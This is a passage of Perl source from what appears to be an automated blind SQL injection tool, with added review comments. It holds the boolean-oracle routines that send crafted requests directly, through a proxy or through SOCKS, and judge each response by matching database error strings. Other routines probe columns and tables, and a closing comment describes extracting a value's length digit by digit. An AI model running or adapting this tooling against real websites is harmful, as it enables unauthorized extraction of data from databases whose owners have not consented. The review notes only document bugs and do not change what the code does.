  8815.            . "Referer: " . $referer . "\r\n"
  8816.            . "Accept: */*\r\n"
  8817.            . "User-Agent: $user_agent\r\n"
  8818.            . "Connection: close\r\n\r\n";
  8819.  
  8820.         }
  8821.     }
  8822.      $res = socks_get();
  8823.      if ($bl_error_type == 1) {
  8824.          if($res =~ m/$bl_error/img) {
  8825.                           blind_t();
  8826.               $result = 1;
  8827.               return $result;
  8828.          } else {
  8829.                           blind_f();
  8830.               return $result;
  8831.          }
  8832.      }
  8833.      if ($bl_error_type == 0) {
  8834.          if($res =~ m/$bl_error/img) {
  8835.                           blind_f();
  8836.               return $result;
  8837.          } else {
  8838.                           blind_t();
  8839.               $result = 1;
  8840.               return $result;
  8841.          }
  8842.      }
  8843.   }
  8844. } else {
        # HTTPS path: req() (defined elsewhere) is called with a fixed 'GET', no body
        # and the login cookie $ck1.  $bl_query is not passed, so unless req() reads it
        # from the global the header under test is never sent over HTTPS.
  8845.    $res = req($host, $current, 'GET', 0, $ck1);
  8846.    if ($bl_error_type == 1) {
  8847.         if($res =~ m/$bl_error/img) {
  8848.                           blind_t();
  8849.              $result = 1;
  8850.              return $result;
  8851.          } else {
  8852.                           blind_f();
  8853.              return $result;
  8854.          }
  8855.    }
  8856.    if ($bl_error_type == 0) {
  8857.         if($res =~ m/$bl_error/img) {
  8858.                           blind_f();
  8859.              return $result;
  8860.         } else {
  8861.              $result = 1;
  8862.                           blind_t();
  8863.              return $result;
  8864.         }
  8865.    }
  8866. }
  8867. }
  8868. }
  8869.  
        # Blind check, POST variant.  Sends $bl_query as the request body to $bl_url
        # (global) and classifies the response by $bl_error exactly as wr_check_HEADER
        # does: with $bl_error_type == 1 a match means TRUE, with 0 a match means FALSE.
        # Returns $result (global): 1 for TRUE, 0 for FALSE.  Overwrites the
        # $host/$current/$res/$socket/$query/$lsd globals; blind_t()/blind_f() only
        # print in test mode.
  8870. sub wr_check_POST {
  8871.   $result = 0;
  8872.   $host = $host3;
  8873.   $current = $bl_url;
  8874.   $res = "";
        # With an empty URL or query nothing is sent; the sub then falls off the end and
        # the caller receives the guard's false value rather than an explicit 0.  The
        # same happens when a connect below fails.
  8875. if($current && $bl_query){
  8876. if ($test_mode==1) {
  8877.     print "===============================================\n";
  8878.     print "URL: $current\n";
  8879.     print "POST query: $bl_query\n";
  8880. }
        # Content-Length counts the characters of $bl_query, but the body written
        # below is $bl_query . "\n", one byte longer than declared.
  8881. $lsd=length $bl_query;
  8882. if ($https_flag == 0) {
  8883.   if ($socks_check == 0) {
  8884.        if ($use_proxy == 0) {
        # IO::Socket::INET looks for the keys Proto and Timeout; PeerProto and TimeOut
        # are not recognised, so the connect is not bounded by $timeout.
  8885.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
        # Header lines end in "\n" rather than the CRLF HTTP specifies; $method is
        # expected to hold the request verb here (set elsewhere in the file).
  8886.                 print $socket "$method $current HTTP/1.$http_protocol\n";
  8887.                 print $socket "Host: $host\n";
  8888.                 if ($cookie) {
  8889.                     print $socket "Cookie: $cookie\n";
  8890.                 }
  8891.                 print $socket "Accept: */*\n";
  8892.                 if ($referer) {
  8893.                     print $socket "Http-Referer: $referer\n";   # non-standard name; the HTTP header is "Referer"
  8894.                 }
  8895.                 if ($user_agent) {
  8896.                     print $socket "User-Agent: $user_agent\n";
  8897.                 }
  8898.                 print $socket "Pragma: no-cache\n";
  8899.                 print $socket "Cache-Control: no-cache\n";
  8900.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
  8901.                 print $socket "Content-Length: $lsd\n";
  8902.                 print $socket "Connection: close\n\n";
  8903.                 print $socket $bl_query ."\n";   # body; the trailing "\n" is not counted in $lsd
  8904.                 $socket->autoflush(1);
        # The outer while reads the status line into $_, and the inner modifier loop
        # then overwrites $_ with each following line, so the status line never reaches
        # $res.  Both classifying branches return from inside the loop; the close after
        # the loop is only reached when $bl_error_type is neither 0 nor 1.
  8905.                 while (<$socket>) {
  8906.                    $res .= $_ while <$socket>;
  8907.                    if ($bl_error_type == 1) {
  8908.                        if($res =~ m/$bl_error/img) {   # $bl_error is a regex, not literal text
  8909.                           close $socket;
  8910.                           blind_t();
  8911.                           $result = 1;
  8912.                           return $result;
  8913.                        } else {
  8914.                           close $socket;
  8915.                           blind_f();
  8916.                           return $result;
  8917.                        }
  8918.                    }
        # This branch returns without closing $socket (the proxy path below does).
  8919.                    if ($bl_error_type == 0) {
  8920.                        if($res =~ m/$bl_error/img) {
  8921.                           blind_f();
  8922.                            return $result;
  8923.                        } else {
  8924.                           blind_t();
  8925.                            $result = 1;
  8926.                            return $result;
  8927.                        }
  8928.                    }
  8929.                 }
  8930.                 close $socket;
  8931.             }
  8932.        } else {
        # HTTP proxy path: the same request sent to $current_proxy_host:$current_proxy_port.
  8933.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
  8934.                 print $socket "$method $current HTTP/1.$http_protocol\n";
  8935.                 print $socket "Host: $host\n";
  8936.                 if ($cookie) {
  8937.                     print $socket "Cookie: $cookie\n";
  8938.                 }
  8939.                 print $socket "Accept: */*\n";
  8940.                 if ($referer) {
  8941.                     print $socket "Http-Referer: $referer\n";   # non-standard name; the HTTP header is "Referer"
  8942.                 }
  8943.                 if ($user_agent) {
  8944.                     print $socket "User-Agent: $user_agent\n";
  8945.                 }
  8946.                 print $socket "Pragma: no-cache\n";
  8947.                 print $socket "Cache-Control: no-cache\n";
  8948.                 print $socket "Content-Type: application/x-www-form-urlencoded\n";
  8949.                 print $socket "Content-Length: $lsd\n";
  8950.                 print $socket "Connection: close\n\n";
  8951.                 print $socket $bl_query ."\n";
  8952.                 $socket->autoflush(1);
  8953.                 while (<$socket>) {
  8954.                    $res  .= $_ while <$socket>;
  8955.                    if ($bl_error_type == 1) {
  8956.                        if($res =~ m/$bl_error/img) {
  8957.                           close $socket;
  8958.                           blind_t();
  8959.                           $result = 1;
  8960.                           return $result;
  8961.                        } else {
  8962.                           close $socket;
  8963.                           blind_f();
  8964.                           return $result;
  8965.                        }
  8966.                    }
  8967.                    if ($bl_error_type == 0) {
  8968.                        if($res =~ m/$bl_error/img) {
  8969.                            close $socket;
  8970.                           blind_f();
  8971.                            return $result;
  8972.                        } else {
  8973.                            close $socket;
  8974.                           blind_t();
  8975.                            $result = 1;
  8976.                            return $result;
  8977.                        }
  8978.                    }
  8979.                 }
  8980.                 close $socket;
  8981.             }
  8982.       }
  8983.    } else {
        # SOCKS path: the request is assembled into the package global $query for
        # socks_get() (defined elsewhere).  The first lines use "\r\n" and the last
        # header lines use "\n", and the body again carries an extra "\n" beyond $lsd.
        # "Referer:" is emitted even when $referer is empty.
  8984.       $check_url = $current;
  8985.       $check_host = $host;
  8986.     if ($cookie) {
  8987.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
  8988.            . "Host: $check_host\r\n"
  8989.            . "Cookie: $cookie\r\n"
  8990.            . "Referer: " . $referer . "\r\n"
  8991.            . "Accept: */*\r\n"
  8992.            . "User-Agent: $user_agent\r\n"
  8993.            . "Content-Type: application/x-www-form-urlencoded\n"
  8994.            . "Content-Length: $lsd\n"
  8995.            . "Connection: close\n\n"
  8996.            .  $bl_query ."\n";
  8997.     } else {
  8998.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
  8999.            . "Host: $check_host\r\n"
  9000.  
  9001.            . "Referer: " . $referer . "\r\n"
  9002.            . "Accept: */*\r\n"
  9003.            . "User-Agent: $user_agent\r\n"
  9004.            . "Content-Type: application/x-www-form-urlencoded\n"
  9005.            . "Content-Length: $lsd\n"
  9006.            . "Connection: close\n\n"
  9007.            .  $bl_query ."\n";
  9008.     }
  9009.      $res = socks_get();
  9010.      if ($bl_error_type == 1) {
  9011.          if($res =~ m/$bl_error/img) {
  9012.                           blind_t();
  9013.               $result = 1;
  9014.               return $result;
  9015.          } else {
  9016.                           blind_f();
  9017.               return $result;
  9018.          }
  9019.      }
  9020.      if ($bl_error_type == 0) {
  9021.          if($res =~ m/$bl_error/img) {
  9022.                           blind_f();
  9023.               return $result;
  9024.          } else {
  9025.                           blind_t();
  9026.               $result = 1;
  9027.               return $result;
  9028.          }
  9029.      }
  9030.   }
  9031. } else {
        # HTTPS path: req() is called with a fixed 'GET' and 0 for the body (the login
        # call elsewhere in the file shows req() takes method and post data in these
        # positions), so over HTTPS this "POST" check sends no body at all.
  9032.    $res = req($host, $current, 'GET', 0, $ck1);
  9033.    if ($bl_error_type == 1) {
  9034.         if($res =~ m/$bl_error/img) {
  9035.                           blind_t();
  9036.              $result = 1;
  9037.              return $result;
  9038.          } else {
  9039.                           blind_f();
  9040.              return $result;
  9041.          }
  9042.    }
  9043.    if ($bl_error_type == 0) {
  9044.         if($res =~ m/$bl_error/img) {
  9045.                           blind_f();
  9046.              return $result;
  9047.         } else {
  9048.                           blind_t();
  9049.              $result = 1;
  9050.              return $result;
  9051.         }
  9052.    }
  9053. }
  9054. }
  9055. }
  9056. sub blind_t{
  9057.      if ($test_mode==1) {
  9058.        print "result: TRUE\n";
  9059.        print "===============================================\n";
  9060.      }
  9061. }
  9062. sub blind_f{
  9063.      if ($test_mode==1) {
  9064.        print "result: FALSE\n";
  9065.        print "===============================================\n";
  9066.      }
  9067. }
        # Blind check, URL variant.  Here $bl_query (global) is the request target
        # itself; the response is classified by $bl_error as in the other wr_check_*
        # subs: with $bl_error_type == 1 a match means TRUE, with 0 a match means
        # FALSE.  Returns $result (global): 1 for TRUE, 0 for FALSE.  Overwrites the
        # $host/$current/$res/$socket/$query globals; blind_t()/blind_f() only print in
        # test mode.
  9068. sub wr_check {
  9069.   $result = 0;
  9070.   $host = $host5;
  9071.   $current = $bl_query;
  9072.   $res = "";
        # With an empty target or host nothing is sent; the sub then falls off the end
        # and the caller receives the guard's false value rather than an explicit 0.
        # The same happens when a connect below fails.
  9073. if ($current && $host){
  9074. if ($test_mode==1) {
  9075.     print "===============================================\n";
  9076.     print "URL: $current\n";
  9077. }
  9078. if ($https_flag == 0) {
  9079.   if ($socks_check == 0) {
  9080.        if ($use_proxy == 0) {
        # IO::Socket::INET looks for the keys Proto and Timeout; PeerProto and TimeOut
        # are not recognised, so the connect is not bounded by $timeout.
  9081.             if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
        # Header lines end in "\n" rather than the CRLF HTTP specifies; $method is
        # expected to hold the request verb here (set elsewhere in the file).
  9082.                 print $socket "$method $current HTTP/1.$http_protocol\n";
  9083.                 print $socket "Host: $host\n";
  9084.                 if ($cookie) {
  9085.                     print $socket "Cookie: $cookie\n";
  9086.                 }
  9087.                 print $socket "Accept: */*\n";
  9088.                 if ($referer) {
  9089.                     print $socket "Http-Referer: $referer\n";   # non-standard name; the HTTP header is "Referer"
  9090.                 }
  9091.                 if ($user_agent) {
  9092.                     print $socket "User-Agent: $user_agent\n";
  9093.                 }
  9094.                 print $socket "Pragma: no-cache\n";
  9095.                 print $socket "Cache-Control: no-cache\n";
  9096.                 print $socket "Connection: close\n\n";
  9097.                 $socket->autoflush(1);
        # The outer while reads the status line into $_, and the inner modifier loop
        # then overwrites $_ with each following line, so the status line never reaches
        # $res.  Both classifying branches return from inside the loop; the close after
        # the loop is only reached when $bl_error_type is neither 0 nor 1.
  9098.                 while (<$socket>) {
  9099.                    $res .= $_ while <$socket>;
  9100.                    if ($bl_error_type == 1) {
  9101.                        if($res =~ m/$bl_error/img) {   # $bl_error is a regex, not literal text
  9102.                           close $socket;
  9103.                           $result = 1;
  9104.                           blind_t();
  9105.                           return $result;
  9106.                        } else {
  9107.                           close $socket;
  9108.                           blind_f();
  9109.                           return $result;
  9110.                        }
  9111.                    }
        # This branch returns without closing $socket (the proxy path below does).
  9112.                    if ($bl_error_type == 0) {
  9113.                        if($res =~ m/$bl_error/img) {
  9114.                            blind_f();
  9115.                            return $result;
  9116.                        } else {
  9117.                           $result = 1;
  9118.                           blind_t();
  9119.                           return $result;
  9120.                        }
  9121.                    }
  9122.                 }
  9123.                 close $socket;
  9124.             }
  9125.        } else {
        # HTTP proxy path: the same request sent to $current_proxy_host:$current_proxy_port.
  9126.             if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
  9127.                 print $socket "$method $current HTTP/1.$http_protocol\n";
  9128.                 print $socket "Host: $host\n";
  9129.                 if ($cookie) {
  9130.                     print $socket "Cookie: $cookie\n";
  9131.                 }
  9132.                 print $socket "Accept: */*\n";
  9133.                 if ($referer) {
  9134.                     print $socket "Http-Referer: $referer\n";   # non-standard name; the HTTP header is "Referer"
  9135.                 }
  9136.                 if ($user_agent) {
  9137.                     print $socket "User-Agent: $user_agent\n";
  9138.                 }
  9139.                 print $socket "Pragma: no-cache\n";
  9140.                 print $socket "Cache-Control: no-cache\n";
  9141.                 print $socket "Connection: close\n\n";
  9142.                 $socket->autoflush(1);
  9143.                 while (<$socket>) {
  9144.                    $res  .= $_ while <$socket>;
  9145.                    if ($bl_error_type == 1) {
  9146.                        if($res =~ m/$bl_error/img) {
  9147.                           close $socket;
  9148.                           $result = 1;
  9149.                           blind_t();
  9150.                           return $result;
  9151.                        } else {
  9152.                           close $socket;
  9153.                           blind_f();
  9154.                           return $result;
  9155.                        }
  9156.                    }
  9157.                    if ($bl_error_type == 0) {
  9158.                        if($res =~ m/$bl_error/img) {
  9159.                            close $socket;
  9160.                           blind_f();
  9161.                            return $result;
  9162.                        } else {
  9163.                            close $socket;
  9164.                            $result = 1;
  9165.                           blind_t();
  9166.                            return $result;
  9167.                        }
  9168.                    }
  9169.                 }
  9170.                 close $socket;
  9171.             }
  9172.       }
  9173.    } else {
        # SOCKS path: the request is assembled into the package global $query for
        # socks_get() (defined elsewhere).  "Referer:" is emitted even when $referer is
        # empty, unlike the direct path above.
  9174.       $check_url = $current;
  9175.       $check_host = $host;
  9176.     if ($cookie) {
  9177.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
  9178.            . "Host: $check_host\r\n"
  9179.            . "Cookie: $cookie\r\n"
  9180.            . "Referer: " . $referer . "\r\n"
  9181.            . "Accept: */*\r\n"
  9182.            . "User-Agent: $user_agent\r\n"
  9183.            . "Connection: close\r\n\r\n";
  9184.     } else {
  9185.       our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
  9186.            . "Host: $check_host\r\n"
  9187.            . "Referer: " . $referer . "\r\n"
  9188.            . "Accept: */*\r\n"
  9189.            . "User-Agent: $user_agent\r\n"
  9190.            . "Connection: close\r\n\r\n";
  9191.     }
  9192.      $res = socks_get();
  9193.      if ($bl_error_type == 1) {
  9194.          if($res =~ m/$bl_error/img) {
  9195.               $result = 1;
  9196.               blind_t();
  9197.               return $result;
  9198.          } else {
  9199.               blind_f();
  9200.               return $result;
  9201.          }
  9202.      }
  9203.      if ($bl_error_type == 0) {
  9204.          if($res =~ m/$bl_error/img) {
  9205.               blind_f();
  9206.               return $result;
  9207.          } else {
  9208.               $result = 1;
  9209.               blind_t();
  9210.               return $result;
  9211.          }
  9212.      }
  9213.   }
  9214. } else {
        # HTTPS path: req() (defined elsewhere) with a fixed 'GET', no body and the
        # login cookie $ck1; $method is not consulted here.
  9215.    $res = req($host, $current, 'GET', 0, $ck1);
  9216.    if ($bl_error_type == 1) {
  9217.         if($res =~ m/$bl_error/img) {
  9218.              $result = 1;
  9219.              blind_t();
  9220.              return $result;
  9221.          } else {
  9222.              blind_f();
  9223.              return $result;
  9224.          }
  9225.    }
  9226.    if ($bl_error_type == 0) {
  9227.         if($res =~ m/$bl_error/img) {
  9228.              blind_f();
  9229.              return $result;
  9230.         } else {
  9231.              $result = 1;
  9232.              blind_t();
  9233.              return $result;
  9234.         }
  9235.    }
  9236. }
  9237. }
  9238. }
# Boolean oracle for the column-probing step.
#
# Sends the request line in $current10 to $host5 and reports whether the
# response body matches the configured pattern $sql_mess.  Takes no
# arguments; everything is read from package globals ($host5, $current10,
# $method, $http_protocol, $cookie, $referer, $user_agent, $timeout,
# $https_flag, $socks_check, $use_proxy, $current_proxy_host,
# $current_proxy_port, $sql_mess, $sql_mess_type, $ck1).
#
# Returns $result (1 or 0) and also leaves it in the package global.
# Other globals overwritten as a side effect: $host, $current, $res,
# $check_url, $check_host, $query, $socket.
#
# Interpretation of the match depends on $sql_mess_type:
#   1 - a match on $sql_mess means "true"  (result 1)
#   0 - a match on $sql_mess means "false" (result 0)
#
# Transport selection: $https_flag == 0 -> raw socket (direct, through an
# HTTP proxy, or through socks_get() when $socks_check != 0);
# otherwise the request goes through req().
#
# NOTE(review): $sql_mess is interpolated into the pattern unescaped, so any
# regex metacharacter in the configured string alters or breaks the match;
# m/\Q$sql_mess\E/i would treat it literally.
# NOTE(review): `while (<$socket>) { $res .= $_ while <$socket>; ... }` reads
# the first response line (the HTTP status line) into $_ and never appends
# it to $res, so $res always lacks that line.
sub column_check {
  $result = 0;
  $host = $host5;
  $current = $current10;
  $res = "";
if ($https_flag == 0) {
  if ($socks_check == 0) {
       if ($use_proxy == 0) {
            # Direct connection.  A failed connect falls through to the
            # bottom of the sub and yields $result == 0 (indistinguishable
            # from a genuine "false" answer).
            if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    # NOTE(review): "Http-Referer" is not the standard header
                    # name; the socks branch below sends "Referer".  Line
                    # endings here are bare "\n" rather than the "\r\n" used
                    # in the socks branch.
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
                # Redundant: IO::Socket handles are autoflushed on creation.
                $socket->autoflush(1);
                while (<$socket>) {
                   # Slurp the remainder of the response, then decide once.
                   $res .= $_ while <$socket>;
                   if ($sql_mess_type == 1) {
                       if($res =~ m/$sql_mess/img) {
                          close $socket;
                          $result = 1;
                          return $result;
                       } else {
                          close $socket;
                          return $result;
                       }
                   }
                   if ($sql_mess_type == 0) {
                       # NOTE(review): unlike every other branch in this sub,
                       # these two returns leave $socket open; it is only
                       # released when the global is next reassigned.
                       if($res =~ m/$sql_mess/img) {
                           return $result;
                       } else {
                           $result = 1;
                           return $result;
                       }
                   }
                }
                close $socket;
            }
       } else {
            # Same request, sent to the HTTP proxy with the absolute URL in
            # $current as the request target.
            if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                while (<$socket>) {
                   $res  .= $_ while <$socket>;
                   if ($sql_mess_type == 1) {
                       if($res =~ m/$sql_mess/img) {
                          close $socket;
                          $result = 1;
                          return $result;
                       } else {
                          close $socket;
                          return $result;
                       }
                   }
                   if ($sql_mess_type == 0) {
                       if($res =~ m/$sql_mess/img) {
                           close $socket;
                           return $result;
                       } else {
                           close $socket;
                           $result = 1;
                           return $result;
                       }
                   }
                }
                close $socket;
            }
      }
   } else {
      # SOCKS path: build the raw request text into the package global
      # $query; socks_get() presumably reads it from there (not visible
      # here - verify against its definition).
      $check_url = $current;
      $check_host = $host;
    if ($cookie) {
      our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Cookie: $cookie\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";
    } else {
      our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";
    }
     $res = socks_get();
     if ($sql_mess_type == 1) {
         if($res =~ m/$sql_mess/img) {
              $result = 1;
              return $result;
         } else {
              return $result;
         }
     }
     if ($sql_mess_type == 0) {
         if($res =~ m/$sql_mess/img) {
              return $result;
         } else {
              $result = 1;
              return $result;
         }
     }
  }
} else {
   # HTTPS path: delegate the transport to req() and evaluate its body.
   $res = req($host, $current, $method, 0, $ck1);
   if ($sql_mess_type == 1) {
         if($res =~ m/$sql_mess/img) {
              $result = 1;
              return $result;
         } else {
              return $result;
         }
     }
     if ($sql_mess_type == 0) {
         if($res =~ m/$sql_mess/img) {
              return $result;
         } else {
              $result = 1;
              return $result;
         }
     }
}
}
# Boolean oracle used by the "a_" (alternate) column-probing step.
#
# Sends $a_current to $host10 and returns 1 when the response matches the
# pattern in $current_error (copied into the global $global_error), else 0.
# Unlike column_check there is no type switch: a match always means 1.
# No arguments; reads the same transport globals as column_check
# ($method, $http_protocol, $cookie, $referer, $user_agent, $timeout,
# $https_flag, $socks_check, $use_proxy, $current_proxy_host,
# $current_proxy_port, $ck1).
#
# Side effects on package globals: $result, $current, $host, $global_error,
# $res, $check_url, $check_host, $query, $socket.
#
# NOTE(review): $global_error is interpolated into the regex unescaped
# (see column_check); a literal match would need \Q...\E.
# NOTE(review): the socket read loop drops the first response line
# (the status line) - same pattern as column_check.
sub a_column_check {
  $result = 0;
  $current = $a_current;
  $host = $host10;
  $global_error = $current_error;
  $res = "";
if ($https_flag == 0) {
  if ($socks_check == 0) {
       if ($use_proxy == 0) {
            # Direct connection; a failed connect returns 0.
            if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    # Non-standard header name (should be "Referer").
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                while (<$socket>) {
                   $res .= $_ while <$socket>;
                   # /s so that "." in the pattern can span line breaks.
                   if($res =~ m/$global_error/imgs) {
                          close $socket;
                          $result = 1;
                          return $result;
                   } else {
                          close $socket;
                          return $result;
                   }
                }
                close $socket;
            }
       } else {
            # Same request via the configured HTTP proxy.
            if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                while (<$socket>) {
                   $res .= $_ while <$socket>;
                   if($res =~ m/$global_error/imgs) {
                          close $socket;
                          $result = 1;
                          return $result;
                   } else {
                          close $socket;
                          return $result;
                   }
                }
                close $socket;
            }
      }
   } else {
      # SOCKS path: request text goes into the global $query for socks_get()
      # (presumably read from there - verify against socks_get).
      $check_url = $current;
      $check_host = $host;
    if ($cookie) {
      our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Cookie: $cookie\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";
    } else {
      our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";
    }
     $res = socks_get();
     if($res =~ m/$global_error/imgs) {
          $result = 1;
          return $result;
     } else {
          return $result;
     }
  }
} else {
   # HTTPS path via req().
   $res = req($host, $current, $method, 0, $ck1);
   if($res =~ m/$global_error/imgs) {
          $result = 1;
          return $result;
   } else {
          return $result;
   }
}
}
# Boolean oracle used by the "a_" table-probing step.
#
# Sends $a_current to $host10 and returns 0 when the response matches
# $current_error (via $global_error) or any of four fixed error strings
# ("Syntax error", "Could not find", "cannot find the input table",
# "Too few parameters"); returns 1 otherwise.  Note the polarity is the
# reverse of a_column_check: an error in the page means "no".
# No arguments; reads the same transport globals as column_check.
#
# Side effects on package globals: $result, $current, $host, $global_error,
# $res, $check_url, $check_host, $query, $socket.
#
# NOTE(review): the socks branch matches $global_error with /img (no /s)
# while the other three branches use /imgs; "." in the pattern therefore
# behaves differently across transports.
# NOTE(review): $global_error is interpolated unescaped (see column_check),
# and the socket read loop drops the HTTP status line.
sub a_table_check {
  $result = 0;
  $current = $a_current;
  $host = $host10;
  $global_error = $current_error;
  $res = "";
if ($https_flag == 0) {
  if ($socks_check == 0) {
       if ($use_proxy == 0) {
            # Direct connection; a failed connect returns 0.
            if ($socket=IO::Socket::INET->new( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    # Non-standard header name (should be "Referer").
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                while (<$socket>) {
                   $res .= $_ while <$socket>;
                   # Any error indicator in the page -> 0; a clean page -> 1.
                   if($res =~ m/$global_error/imgs || $res =~ m/Syntax error/imgs || $res =~ m/Could not find/imgs || $res =~ m/cannot find the input table/imgs || $res =~ m/Too few parameters/imgs)  {
                          close $socket;
                          return $result;
                   } else {
                          close $socket;
                          $result = 1;
                          return $result;
                   }
                }
                close $socket;
            }
       } else {
            # Same request via the configured HTTP proxy.
            if ($socket=IO::Socket::INET->new( PeerAddr => $current_proxy_host, PeerPort => $current_proxy_port, PeerProto => 'tcp', TimeOut => $timeout)) {
                print $socket "$method $current HTTP/1.$http_protocol\n";
                print $socket "Host: $host\n";
                if ($cookie) {
                    print $socket "Cookie: $cookie\n";
                }
                print $socket "Accept: */*\n";
                if ($referer) {
                    print $socket "Http-Referer: $referer\n";
                }
                if ($user_agent) {
                    print $socket "User-Agent: $user_agent\n";
                }
                print $socket "Pragma: no-cache\n";
                print $socket "Cache-Control: no-cache\n";
                print $socket "Connection: close\n\n";
                $socket->autoflush(1);
                while (<$socket>) {
                   $res .= $_ while <$socket>;
                   if($res =~ m/$global_error/imgs || $res =~ m/Syntax error/imgs || $res =~ m/Could not find/imgs || $res =~ m/cannot find the input table/imgs || $res =~ m/Too few parameters/imgs)  {
                          close $socket;
                          return $result;
                   } else {
                          close $socket;
                          $result = 1;
                          return $result;
                   }
                }
                close $socket;
            }
      }
  } else {
      # SOCKS path: request text goes into the global $query for socks_get()
      # (presumably read from there - verify against socks_get).
      $check_url = $current;
      $check_host = $host;
    if ($cookie) {
      our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Cookie: $cookie\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";
    } else {
      our $query = "$method $check_url HTTP/1.$http_protocol\r\n"
           . "Host: $check_host\r\n"
           . "Referer: " . $referer . "\r\n"
           . "Accept: */*\r\n"
           . "User-Agent: $user_agent\r\n"
           . "Connection: close\r\n\r\n";
    }
     $res = socks_get();
     # /img here, /imgs everywhere else - see the note above.
     if($res =~ m/$global_error/img || $res =~ m/Syntax error/imgs || $res =~ m/Could not find/imgs || $res =~ m/cannot find the input table/imgs || $res =~ m/Too few parameters/imgs)  {
         return $result;
     } else {
         $result = 1;
         return $result;
     }
  }
} else {
   # HTTPS path via req().
   $res = req($host, $current, $method, 0, $ck1);
   if($res =~ m/$global_error/imgs || $res =~ m/Syntax error/imgs || $res =~ m/Could not find/imgs || $res =~ m/cannot find the input table/imgs || $res =~ m/Too few parameters/imgs)  {
         return $result;
   } else {
         $result = 1;
         return $result;
   }
}
}
# Determines length($bl_current) digit by digit through the boolean oracle
# (wr_check / wr_check_POST / wr_check_HEADER, selected by $sql_flag), using
# probes joined to $bbbl_url with an "and" connective.
#
# Phase 1: find how many decimal digits the length has ($len_len), by
# asking "LEAST(length(length(x)), n) = n" for n = 1, 2, 3 and stopping at
# the first "no".  Phase 2: for each digit position $i, first ask whether
# the digit is >= 5 (GREATEST(mid(...),5) = 5), then test the candidates in
# the matching half one by one and append the one that answers "yes".
#
# No arguments.  Reads globals $sql_flag, $bl_url, $sql_post, $sql_header,
# $bl_plus, $bl_current, $bl_filtr; overwrites globals $len_len, $flag,
